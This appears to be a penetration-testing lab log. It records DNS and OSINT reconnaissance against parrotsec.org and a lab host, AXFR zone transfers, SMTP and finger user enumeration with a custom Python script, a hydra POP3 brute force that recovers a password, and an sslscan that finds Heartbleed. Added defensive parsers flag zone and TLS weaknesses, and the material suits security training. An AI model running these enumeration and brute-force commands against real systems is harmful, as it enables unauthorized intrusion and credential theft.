[recon-ng][default] > workspaces create hackerhouse
- Error:
[*] No modules enabled/installed.
$theHarvester -d parrotsec.org -b google
*******************************************************************
* _ _ _ *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* theHarvester 4.0.0 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *
* *
*******************************************************************
[*] Target: parrotsec.org
Searching 0 results.
Searching 100 results.
Searching 200 results.
Searching 300 results.
Searching 400 results.
Searching 500 results.
[*] Searching Google.
[*] No IPs found.
[*] Emails found: 2
----------------------
[email protected]
[email protected]
[*] Hosts found: 11
---------------------
archive.parrotsec.org:51.83.238.32, 51.79.178.45, 139.99.69.216
community.parrotsec.org:51.79.178.45, 139.99.69.216
community.parrotsec.org:139.99.69.216, 51.79.178.45
deb.parrotsec.org:139.99.69.216, 51.79.178.45
docs.parrotsec.org:139.99.69.216, 51.79.178.45
irc.parrotsec.org:51.79.178.45, 139.99.69.216
lists.parrotsec.org:51.79.178.45, 139.99.69.216
nest.parrotsec.org:51.79.178.45, 139.99.69.216
u003darchive.parrotsec.org:139.99.69.216, 51.79.178.45
www.parrotsec.org:139.99.69.216, 51.79.178.45
- Metagoofil
- goofileN: a small custom project written in Nim for ParrotOS that merges ideas from goofile and metagoofil
- Maltego
- LinkedInt
- shodan
- nslookup
$nslookup
> set querytype=SOA
> parrotsec.org
Server: 1.1.1.1
Address: 1.1.1.1#53
Non-authoritative answer:
parrotsec.org
origin = pola.ns.cloudflare.com
mail addr = dns.cloudflare.com
serial = 2038500112
refresh = 10000
retry = 2400
expire = 604800
minimum = 3600
Authoritative answers can be found from:
> set querytype=MX
> parrotsec.org
Server: 1.1.1.1
Address: 1.1.1.1#53
Non-authoritative answer:
parrotsec.org mail exchanger = 20 mailserver1.parrotsec.org.
parrotsec.org mail exchanger = 10 mailserver2.parrotsec.org.
parrotsec.org mail exchanger = 1 mail.parrotsec.org.
Authoritative answers can be found from:
- dig
dig parrotsec.org ANY
; <<>> DiG 9.16.15-Debian <<>> parrotsec.org ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOTIMP, id: 41055
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;parrotsec.org. IN ANY
;; Query time: 47 msec
;; SERVER: 1.1.1.1#53(1.1.1.1)
;; WHEN: Tue Oct 26 00:12:17 +07 2021
;; MSG SIZE rcvd: 42
$dig @192.168.56.7 chaos authors.bind txt
; <<>> DiG 9.16.15-Debian <<>> @192.168.56.7 chaos authors.bind txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4671
;; flags: qr aa rd; QUERY: 1, ANSWER: 15, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;authors.bind. CH TXT
;; ANSWER SECTION:
authors.bind. 0 CH TXT "Danny Mayer"
authors.bind. 0 CH TXT "Damien Neil"
authors.bind. 0 CH TXT "Matt Nelson"
authors.bind. 0 CH TXT "Jeremy C. Reed"
authors.bind. 0 CH TXT "Michael Sawyer"
authors.bind. 0 CH TXT "Brian Wellington"
authors.bind. 0 CH TXT "Mark Andrews"
authors.bind. 0 CH TXT "James Brister"
authors.bind. 0 CH TXT "Ben Cottrell"
authors.bind. 0 CH TXT "Michael Graff"
authors.bind. 0 CH TXT "Andreas Gustafsson"
authors.bind. 0 CH TXT "Bob Halley"
authors.bind. 0 CH TXT "Evan Hunt"
authors.bind. 0 CH TXT "JINMEI Tatuya"
authors.bind. 0 CH TXT "David Lawrence"
;; AUTHORITY SECTION:
authors.bind. 0 CH NS authors.bind.
;; Query time: 3 msec
;; SERVER: 192.168.56.7#53(192.168.56.7)
;; WHEN: Tue Oct 26 00:15:59 +07 2021
;; MSG SIZE rcvd: 441
$dig @192.168.56.7 axfr nsa.gov
; <<>> DiG 9.16.15-Debian <<>> @192.168.56.7 axfr nsa.gov
; (1 server found)
;; global options: +cmd
nsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600
nsa.gov. 3600 IN NS ns1.nsa.gov.
nsa.gov. 3600 IN NS ns2.nsa.gov.
nsa.gov. 3600 IN MX 10 mail1.nsa.gov.
nsa.gov. 3600 IN MX 20 mail2.nsa.gov.
fedora.nsa.gov. 3600 IN TXT "The black sparrow password"
fedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337
fedora.nsa.gov. 3600 IN A 10.1.0.80
firewall.nsa.gov. 3600 IN A 10.1.0.105
fw.nsa.gov. 3600 IN A 10.1.0.102
mail1.nsa.gov. 3600 IN TXT "v=spf1 a mx ip4:10.1.0.25 ~all"
mail1.nsa.gov. 3600 IN A 10.1.0.25
mail2.nsa.gov. 3600 IN TXT "v=spf1 a mx ip4:10.1.0.26 ~all"
mail2.nsa.gov. 3600 IN A 10.1.0.26
ns1.nsa.gov. 3600 IN A 10.1.0.50
ns2.nsa.gov. 3600 IN A 10.1.0.51
prism.nsa.gov. 3600 IN A 172.16.40.1
prism6.nsa.gov. 3600 IN AAAA ::1
sigint.nsa.gov. 3600 IN A 10.1.0.101
snowden.nsa.gov. 3600 IN A 172.16.40.1
vpn.nsa.gov. 3600 IN A 10.1.0.103
web.nsa.gov. 3600 IN CNAME fedora.nsa.gov.
webmail.nsa.gov. 3600 IN A 10.1.0.104
www.nsa.gov. 3600 IN CNAME fedora.nsa.gov.
xkeyscore.nsa.gov. 3600 IN TXT "knock twice to enter"
xkeyscore.nsa.gov. 3600 IN A 10.1.0.100
nsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600
;; Query time: 0 msec
;; SERVER: 192.168.56.7#53(192.168.56.7)
;; WHEN: Tue Oct 26 00:16:35 +07 2021
;; XFR size: 27 records (messages 1, bytes 709)
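The transfer above succeeds because the lab nameserver answers AXFR for anyone; a defender reviewing such a dump of their own zone wants to know what it gives away beyond the hostnames themselves. The following is an added example, not code from the course or from dig: a Python parser for dig's AXFR listing that flags records publishing non-routable (RFC 1918, loopback) addresses and free-text TXT records that are not SPF/DKIM/DMARC policy. The sample input is a constructed excerpt in dig's output format modelled on the lab zone; the checks are this example's own.

```python
import ipaddress
import re

# Constructed sample in the format dig prints for AXFR (modelled on the lab zone above).
SAMPLE_AXFR = """\
nsa.gov.          3600    IN      SOA     ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600
nsa.gov.          3600    IN      NS      ns1.nsa.gov.
nsa.gov.          3600    IN      MX      10 mail1.nsa.gov.
fedora.nsa.gov.   3600    IN      TXT     "The black sparrow password"
fedora.nsa.gov.   3600    IN      A       10.1.0.80
mail1.nsa.gov.    3600    IN      TXT     "v=spf1 a mx ip4:10.1.0.25 ~all"
mail1.nsa.gov.    3600    IN      A       10.1.0.25
prism.nsa.gov.    3600    IN      A       172.16.40.1
www.nsa.gov.      3600    IN      CNAME   fedora.nsa.gov.
"""

# owner  ttl  IN  type  rdata   (dig separates the fields with tabs or spaces)
RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(.*)$")

# TXT prefixes that are expected mail-policy records rather than free text
POLICY_TXT_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1")


def parse_axfr(text):
    """Parse dig's AXFR listing into (name, ttl, type, rdata) tuples.

    Comment lines (';;') and blanks are skipped. dig prints the SOA at the start
    and again at the end of a transfer, so each record is kept only once.
    """
    records = []
    seen = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if not m:
            continue
        rec = (m.group(1), int(m.group(2)), m.group(3), m.group(4).strip())
        if rec not in seen:
            seen.add(rec)
            records.append(rec)
    return records


def zone_findings(records):
    """Return (owner, message) pairs for records a public zone should not carry."""
    findings = []
    for name, _ttl, rtype, rdata in records:
        if rtype in ("A", "AAAA"):
            addr = ipaddress.ip_address(rdata)
            if addr.is_private or addr.is_loopback:
                findings.append((name, f"{rtype} record publishes non-routable address {rdata}"))
        elif rtype == "TXT":
            body = rdata.strip('"')
            if not body.lower().startswith(POLICY_TXT_PREFIXES):
                findings.append((name, f"free-text TXT record: {body!r}"))
    return findings


if __name__ == "__main__":
    for owner, msg in zone_findings(parse_axfr(SAMPLE_AXFR)):
        print(f"{owner}\t{msg}")
```

Feed it a real dump with `parse_axfr(open("zone.txt").read())`; the first action on any finding is still to restrict AXFR to the secondaries in the server's allow-transfer list, since the records themselves are only the symptom.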
- fierce
fierce --dns-servers 192.168.56.7 --domain nsa.gov
NS: ns1.nsa.gov. ns2.nsa.gov.
SOA: ns1.nsa.gov. (10.1.0.50)
- dnsrecon
$dnsrecon -d nsa.gov -n 192.168.56.7
[*] Performing General Enumeration of Domain: nsa.gov
[*] DNSSEC is configured for nsa.gov
[*] DNSKEYs:
[*] None ZSK RSASHA1NSEC3SHA1 03010001a388d849849780d306207a85 02159c28a004f60fb376bccf88d99f21 b300c0922b33e7372bca1e6bdf6f5c2d 3bbc0ce02b6effcf4a47269a23a121b6 c8af7bb60dc82916c962436d6d52969f 00494ece4e3513dca2354009c0676e4b e413ce2b1e7017ce4dfed731974234cd 811652b1267ce987c91a24d28bdf7ea0 4780aac7
[*] None ZSK RSASHA1NSEC3SHA1 03010001c0c3d369835f895767f0138e 356864464ab267c30a80b99352ee2c84 ea813ba333eff414485c2c3225e831e3 3bd9e737aa0bb47359b24f49f9939b9f 87fa63e38cb823ed797b724fb96e40c3 723c5038c31f901d3f11ddb603f4faf8 648e76be9ed433a748dba757e0d4ea3c 4b6e874411acb1f4b61e7bf4eca0bcec 4e9a49ef
[*] None KSk RSASHA1NSEC3SHA1 03010001c7599346c3ee0382fdb4787a 4c8139d992072476bbfad2bbed3113cc e8b8514c5c0fabdf99a1d86a138c9a24 24ae3c4150a87e45fa4f9b034776f528 c9729514139ec5bf10afe018cd686f81 f2bf045924ccd2351abb9ec383867ad3 309e113d46b99d1d4d0be62027fecf2f 9485a96d62a13e5a2a7c4e362a885241 abc5b6b397caa1ea06a16941100ce9f6 67b0afa0bd09b2e0b403fecd451c8dbb f19f6e310149a40c34f5d4b6dc522036 b547387eb4bcc8d8db28f0af9e5103c7 2bf6ca9f3389b24c9ed4dbd4448895ca 22d419cf4178b46ca17dea10eea59957 95cb18d0724d896a33b8ac0cbf46d10f 3c1ebdef5e97829ee64f0f3a2badcbc5 b5f7a2e7
[*] NS ns2.nsa.gov 10.1.0.51
[*] NS ns1.nsa.gov 10.1.0.50
[*] MX mail2.nsa.gov 10.1.0.26
[*] MX mail1.nsa.gov 10.1.0.25
[*] Enumerating SRV Records
[+] 0 Records Found
- dnsenum
- smtp-user-enum
$smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.56.7
(very long list)
- ismtp
$ismtp -h 192.168.56.7 -e /usr/share/wordlists/metasploit/unix_users.txt
(very long list)
- Custom python file to enumerate finger service
$cat finger_enum.py
import argparse
import socket


def recv_all(s):
    """Read until the finger server closes the connection (or goes quiet)."""
    result = ""
    buf = 32
    while True:
        try:
            data = s.recv(buf)
        except socket.timeout:
            return result          # server did not close; return what we have
        if not data:
            return result
        result += data.decode(errors="replace")


def do_enumerate(target, wordlist):
    # finger (TCP/79) answers one query per connection, so open a new socket per name
    with open(wordlist) as names:
        for username in names:
            username = username.strip()
            if not username:
                continue
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(5)
                s.connect((target, 79))
                s.send((username + "\r\n").encode())   # RFC 1288 query is the name followed by CRLF
                result = recv_all(s)
                if "No one logged on" not in result and "no such user" not in result:
                    print(result)
                s.close()
            except Exception as error:
                print(error)


parser = argparse.ArgumentParser()
parser.add_argument("-t", help="target")
parser.add_argument("-w", help="wordlist file")
args = parser.parse_args()
do_enumerate(args.t, args.w)
Result
python3 finger_enum.py -t 192.168.56.7 -w /usr/share/wordlists/metasploit/unix_users.txt
Login: backup Name: backup
Directory: /var/backups Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: bin Name: bin
Directory: /bin Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: colord Name: colord colour management daemon
Directory: /var/lib/colord Shell: /bin/false
Never logged in.
No mail.
No Plan.
-- very long result --
- custom tool logidoor for the web mail server: ran, but the login analysis produced false positives
- hydra
$hydra -L mail_user -P mail_password pop3://192.168.56.7
Result
[110][pop3] host: 192.168.56.7 login: johnk password: webmail
- sslscan
$sslscan 192.168.56.7
Version: 2.0.10-static
OpenSSL 1.1.1l-dev xx XXX xxxx
Connected to 192.168.56.7
Testing SSL server 192.168.56.7 on port 443 using SNI name 192.168.56.7
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 disabled
TLS Fallback SCSV:
Server does not support TLS Fallback SCSV
TLS renegotiation:
Secure session renegotiation supported
TLS Compression:
Compression disabled
Heartbleed:
TLSv1.2 vulnerable to heartbleed
TLSv1.1 vulnerable to heartbleed
TLSv1.0 vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Server Key Exchange Group(s):
TLSv1.2 128 bits secp256r1 (NIST P-256)
SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 1024
Subject: hackbloc.linux01.lab
Issuer: Superfish, Inc.
Not valid before: May 12 16:25:00 2014 GMT
Not valid after: May 7 16:25:00 2034 GMT
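Reading a scan like this by eye is error-prone when there are many hosts, so a defender normally pulls the weak settings out mechanically. The following is an added example, not code from the course or from sslscan: a Python parser for sslscan's text output that flags what is visible above (legacy TLS versions enabled, TLSv1.3 off, no TLS_FALLBACK_SCSV with several versions enabled, Heartbleed, 1024-bit DHE groups, SHA-1 certificate signature, 1024-bit RSA key). The sample input is a constructed excerpt in sslscan's output format; the thresholds and severities are this example's own assumptions.

```python
import re

# Constructed sample: an excerpt in the format sslscan prints (trimmed from the scan above).
SAMPLE = """\
Testing SSL server 192.168.56.7 on port 443 using SNI name 192.168.56.7
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 disabled
TLS Fallback SCSV:
Server does not support TLS Fallback SCSV
Heartbleed:
TLSv1.2 vulnerable to heartbleed
TLSv1.1 vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 1024
"""

LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
MIN_RSA_BITS = 2048   # assumed policy thresholds
MIN_DHE_BITS = 2048

PROTO_RE = re.compile(r"^(SSLv\d|TLSv1\.\d) (enabled|disabled)$")
HEARTBLEED_RE = re.compile(r"^(TLSv1\.\d) vulnerable to heartbleed$")
# Only finite-field DHE lines end in "DHE <bits> bits"; ECDHE lines end in "DHE <curve bits>"
DHE_CIPHER_RE = re.compile(r"^(?:Preferred|Accepted)\s+(\S+)\s+\d+ bits\s+(\S+).*?\bDHE (\d+) bits")
SIG_RE = re.compile(r"^Signature Algorithm: (\S+)")
RSA_RE = re.compile(r"^RSA Key Strength: (\d+)")


def parse_sslscan(text):
    """Extract the facts a reviewer cares about from sslscan's plain-text output."""
    facts = {"enabled": set(), "disabled": set(), "fallback_scsv": True,
             "heartbleed": set(), "weak_dhe_ciphers": [], "sig_alg": None, "rsa_bits": None}
    for line in text.splitlines():
        line = line.strip()
        if m := PROTO_RE.match(line):
            facts[m.group(2)].add(m.group(1))
        elif line.startswith("Server does not support TLS Fallback SCSV"):
            facts["fallback_scsv"] = False
        elif m := HEARTBLEED_RE.match(line):
            facts["heartbleed"].add(m.group(1))
        elif m := DHE_CIPHER_RE.match(line):
            bits = int(m.group(3))
            if bits < MIN_DHE_BITS:
                facts["weak_dhe_ciphers"].append((m.group(1), m.group(2), bits))
        elif m := SIG_RE.match(line):
            facts["sig_alg"] = m.group(1)
        elif m := RSA_RE.match(line):
            facts["rsa_bits"] = int(m.group(1))
    return facts


def findings(facts):
    """Turn parsed facts into (severity, message) pairs with the remediation."""
    out = []
    for proto in sorted(facts["enabled"] & LEGACY_PROTOCOLS):
        out.append(("medium", f"{proto} is enabled; disable it and serve TLSv1.2+ only"))
    if "TLSv1.3" in facts["disabled"]:
        out.append(("low", "TLSv1.3 is disabled; enable it"))
    if len(facts["enabled"]) > 1 and not facts["fallback_scsv"]:
        out.append(("low", "no TLS_FALLBACK_SCSV with several versions enabled; downgrade protection missing"))
    for proto in sorted(facts["heartbleed"]):
        out.append(("critical", f"{proto} vulnerable to Heartbleed; patch OpenSSL and rotate the private key"))
    for proto, cipher, bits in facts["weak_dhe_ciphers"]:
        out.append(("medium", f"{proto} {cipher} uses {bits}-bit DHE; use >= {MIN_DHE_BITS}-bit groups or ECDHE"))
    if facts["sig_alg"] and facts["sig_alg"].lower().startswith("sha1"):
        out.append(("high", "certificate signed with SHA-1; reissue with SHA-256"))
    if facts["rsa_bits"] is not None and facts["rsa_bits"] < MIN_RSA_BITS:
        out.append(("high", f"{facts['rsa_bits']}-bit RSA key; reissue with >= {MIN_RSA_BITS} bits"))
    return out


if __name__ == "__main__":
    for severity, message in findings(parse_sslscan(SAMPLE)):
        print(f"[{severity}] {message}")
```

Pipe a live scan in with `findings(parse_sslscan(sys.stdin.read()))`; the regexes follow the line shapes in the scan above, so other sslscan versions may need the patterns adjusted.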